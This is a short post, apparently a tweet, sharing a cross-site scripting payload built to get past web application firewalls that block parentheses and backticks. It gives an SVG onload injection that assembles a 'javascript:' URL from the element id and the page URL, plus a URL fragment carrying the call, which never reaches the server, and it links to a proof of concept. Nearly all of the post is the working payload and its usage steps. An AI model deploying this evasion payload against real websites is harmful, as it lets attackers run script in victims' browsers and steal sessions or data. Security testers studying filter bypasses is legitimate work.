Bypassing Complete Parenthesis/Backticks Restrictions in #XSS Payloads with Hiding
#WAF #bypass
1. Inject:
<Svg Id=JavaScrip
OnLoad=location=id+’t:/*’+URL>
2. Place in the end of URL:
#*/confirm(1)
(Everything after # never gets sent to server)
PoC: https://t.co/zxuheCOtZp